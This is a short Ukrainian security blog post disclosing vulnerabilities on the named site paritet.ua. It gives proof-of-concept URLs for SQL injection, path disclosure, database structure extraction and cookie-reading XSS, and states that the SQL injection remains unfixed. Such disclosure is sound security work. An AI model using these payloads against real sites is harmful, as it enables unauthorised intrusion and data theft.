Уразливості на www.paritet.ua
19:04 09.04.201007.10.2009
У лютому, 08.02.2009, я знайшов SQL Injection, Full path disclosure, SQL DB Structure Extraction та Cross-Site Scripting уразливості на сайті http://www.paritet.ua. Про що найближчим часом сповіщу адміністрацію сайта.
Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.
09.04.2010
SQL Injection:
http://www.paritet.ua/?mid=9%20and%20version()=5
Full path disclosure:
http://www.paritet.ua/?mid=-1
SQL DB Structure Extraction:
http://www.paritet.ua/?mid=-1′
XSS:
http://www.paritet.ua/?mid=%3Cscript%3Ealert(document.cookie)%3C/script%3E
Дані уразливості вже виправлені. Окрім SQL Injection уразливості, що дуже несерйозно.